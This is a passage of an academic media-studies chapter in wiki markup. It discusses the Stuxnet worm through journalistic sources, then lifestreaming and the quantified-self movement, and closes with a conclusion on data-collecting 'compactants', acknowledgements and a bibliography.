&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
